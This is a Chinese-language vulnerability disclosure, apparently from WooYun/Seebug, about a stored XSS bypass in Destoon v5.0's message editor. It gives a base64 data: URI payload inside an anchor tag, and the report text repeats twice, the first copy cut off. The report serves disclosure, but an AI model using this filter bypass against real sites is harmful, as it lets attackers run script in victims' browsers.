### 简要描述: destoon /v5.0/ 存储型xss 指哪打哪(绕过1) ### 详细说明: 上次发的 [WooYun: destoon /v5.0/ 存储型xss指哪打哪](http://www.wooyun.org/bugs/wooyun-2014-055638) 注册一个用户 http://127.0.0.1/v5.0/member/message.php?action=send&touser=oboi123&title=RE:RE%3ARE%3Asdaaaaaaa 回复处用了编辑器 编辑器有些标签没过滤,导致xss执行 xsscode: ``` <a href="data:text/html;charset=utf-8;base
64, PHNjcmlwdD5hbGVydChkb2N1bWVudC5kb21haW4pPC9zY3JpcHQ+Og=="> click</a> ``` ### 漏洞证明: [<img src="https://images.seebug.org/upload/201405/16235012ca70002b8abb56db18ff466031c8eac7.jpg" alt="22222222222222222222222222222.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201405/16235012ca70002b8abb56db18ff466031c8eac7.jpg) [<img src="https://images.seebug.org/upload/201405/16235028a7af80687d46bea4865fe4f05df3232e.jpg" alt="222223333.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201405/16235028a7af80687d46bea4865fe4f05df3232e.jpg) [<img...
### 简要描述: destoon /v5.0/ 存储型xss 指哪打哪(绕过1) ### 详细说明: 上次发的 [WooYun: destoon /v5.0/ 存储型xss指哪打哪](http://www.wooyun.org/bugs/wooyun-2014-055638) 注册一个用户 http://127.0.0.1/v5.0/member/message.php?action=send&touser=oboi123&title=RE:RE%3ARE%3Asdaaaaaaa 回复处用了编辑器 编辑器有些标签没过滤,导致xss执行 xsscode: ``` <a href="data:text/html;charset=utf-8;base
64, PHNjcmlwdD5hbGVydChkb2N1bWVudC5kb21haW4pPC9zY3JpcHQ+Og=="> click</a> ``` ### 漏洞证明: [<img src="https://images.seebug.org/upload/201405/16235012ca70002b8abb56db18ff466031c8eac7.jpg" alt="22222222222222222222222222222.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201405/16235012ca70002b8abb56db18ff466031c8eac7.jpg) [<img src="https://images.seebug.org/upload/201405/16235028a7af80687d46bea4865fe4f05df3232e.jpg" alt="222223333.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201405/16235028a7af80687d46bea4865fe4f05df3232e.jpg) [<img src="https://images.seebug.org/upload/201405/162350459a6e0571f536d79e35e77f617999548f.jpg" alt="33333333333333333333.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201405/162350459a6e0571f536d79e35e77f617999548f.jpg)
